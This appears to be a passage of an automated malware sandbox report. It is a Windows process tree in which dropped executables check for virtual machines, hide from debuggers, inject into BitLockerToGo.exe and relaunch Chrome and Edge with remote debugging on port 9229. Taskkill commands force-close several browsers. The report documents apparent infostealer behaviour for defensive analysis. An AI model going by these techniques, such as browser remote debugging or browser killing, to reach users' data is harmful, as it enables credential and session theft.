                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,2954324359669196329,2941225035934118475,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2100 /prefetch:2
                                                                                                                                                                      9⤵
                                                                                                                                                                        PID:6532
                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,2954324359669196329,2941225035934118475,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4792 /prefetch:2
                                                                                                                                                                        9⤵
                                                                                                                                                                          PID:6792
                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,2954324359669196329,2941225035934118475,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2708 /prefetch:2
                                                                                                                                                                          9⤵
                                                                                                                                                                            PID:7040
                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,2954324359669196329,2941225035934118475,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=5088 /prefetch:2
                                                                                                                                                                            9⤵
                                                                                                                                                                              PID:6180
                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,2954324359669196329,2941225035934118475,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3728 /prefetch:2
                                                                                                                                                                              9⤵
                                                                                                                                                                                PID:6596
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe"
                                                                                                                                                                            7⤵
                                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                            • Downloads MZ/PE file
                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                            PID:2236
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                                                                                                                              8⤵
                                                                                                                                                                              • Uses browser remote debugging
                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                                                              PID:6728
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffccb52cc40,0x7ffccb52cc4c,0x7ffccb52cc58
                                                                                                                                                                                9⤵
                                                                                                                                                                                  PID:2324
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2420,i,3064939092966874344,18241551201941583123,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2416 /prefetch:2
                                                                                                                                                                                  9⤵
                                                                                                                                                                                    PID:1752
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1740,i,3064939092966874344,18241551201941583123,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2452 /prefetch:3
                                                                                                                                                                                    9⤵
                                                                                                                                                                                      PID:4720
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1980,i,3064939092966874344,18241551201941583123,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2624 /prefetch:8
                                                                                                                                                                                      9⤵
                                                                                                                                                                                        PID:2968
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3184,i,3064939092966874344,18241551201941583123,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3204 /prefetch:1
                                                                                                                                                                                        9⤵
                                                                                                                                                                                        • Uses browser remote debugging
                                                                                                                                                                                        PID:2160
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3212,i,3064939092966874344,18241551201941583123,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3252 /prefetch:1
                                                                                                                                                                                        9⤵
                                                                                                                                                                                        • Uses browser remote debugging
                                                                                                                                                                                        PID:4968
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4528,i,3064939092966874344,18241551201941583123,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4560 /prefetch:1
                                                                                                                                                                                        9⤵
                                                                                                                                                                                        • Uses browser remote debugging
                                                                                                                                                                                        PID:3568
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4740,i,3064939092966874344,18241551201941583123,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4744 /prefetch:8
                                                                                                                                                                                        9⤵
                                                                                                                                                                                          PID:5612
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4732,i,3064939092966874344,18241551201941583123,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4848 /prefetch:8
                                                                                                                                                                                          9⤵
                                                                                                                                                                                            PID:4828
                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4812,i,3064939092966874344,18241551201941583123,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4800 /prefetch:8
                                                                                                                                                                                            9⤵
                                                                                                                                                                                              PID:6376
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4948,i,3064939092966874344,18241551201941583123,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4408 /prefetch:8
                                                                                                                                                                                              9⤵
                                                                                                                                                                                                PID:3540
                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                                                                                                                                                                              8⤵
                                                                                                                                                                                              • Uses browser remote debugging
                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                                                                              PID:4308
                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffccfae46f8,0x7ffccfae4708,0x7ffccfae4718
                                                                                                                                                                                                9⤵
                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                PID:4444
                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,6872768857220720647,17891803168259626692,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
                                                                                                                                                                                                9⤵
                                                                                                                                                                                                  PID:6100
                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,6872768857220720647,17891803168259626692,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3
                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                    PID:4516
                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,6872768857220720647,17891803168259626692,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:8
                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                      PID:5576
                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2092,6872768857220720647,17891803168259626692,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                      • Uses browser remote debugging
                                                                                                                                                                                                      PID:4652
                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2092,6872768857220720647,17891803168259626692,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                      • Uses browser remote debugging
                                                                                                                                                                                                      PID:4756
                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,6872768857220720647,17891803168259626692,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                        PID:2720
                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2092,6872768857220720647,17891803168259626692,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2428 /prefetch:1
                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                        • Uses browser remote debugging
                                                                                                                                                                                                        PID:6660
                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2092,6872768857220720647,17891803168259626692,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4972 /prefetch:1
                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                        • Uses browser remote debugging
                                                                                                                                                                                                        PID:5852
                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,6872768857220720647,17891803168259626692,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                          PID:6716
                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,6872768857220720647,17891803168259626692,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2756 /prefetch:2
                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                            PID:812
                                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,6872768857220720647,17891803168259626692,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3852 /prefetch:2
                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                              PID:512
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10110300101\b8c0d5bea0.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10110300101\b8c0d5bea0.exe"
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          • Identifies Wine through registry keys
                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                          PID:3036
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10110310101\514e734b05.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10110310101\514e734b05.exe"
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          • Identifies Wine through registry keys
                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                          PID:6752
                                                                                                                                                                                                          • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                            "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                            • Downloads MZ/PE file
                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                            PID:1088
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10110320101\512d15c020.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10110320101\512d15c020.exe"
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                          PID:6332
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10110320101\512d15c020.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10110320101\512d15c020.exe"
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                            PID:6356
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6332 -s 828
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                            PID:3612
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10110330101\2fb0d6c15e.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10110330101\2fb0d6c15e.exe"
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          • Identifies Wine through registry keys
                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                          PID:2636
                                                                                                                                                                                                          • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                            "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                            PID:6624
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10110340101\97cc0bd22d.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10110340101\97cc0bd22d.exe"
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          • Identifies Wine through registry keys
                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                          PID:6984
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10110350101\c195684f8d.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10110350101\c195684f8d.exe"
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                          • Downloads MZ/PE file
                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          • Identifies Wine through registry keys
                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                          PID:5816
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\YCJIBH2BLUK6QXXKJ6V5T8TDZBI02IS.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\YCJIBH2BLUK6QXXKJ6V5T8TDZBI02IS.exe"
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                            PID:412
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10110360101\01fa363024.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10110360101\01fa363024.exe"
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          • Identifies Wine through registry keys
                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                          PID:6072
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10110370101\b8aa1ffff1.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10110370101\b8aa1ffff1.exe"
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                          PID:5992
                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                            taskkill /F /IM firefox.exe /T
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                            PID:1312
                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                            taskkill /F /IM chrome.exe /T
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                            PID:6036
                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                            taskkill /F /IM msedge.exe /T
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                            PID:6644
                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                            taskkill /F /IM opera.exe /T
                                                                                                                                                                                                            8⤵
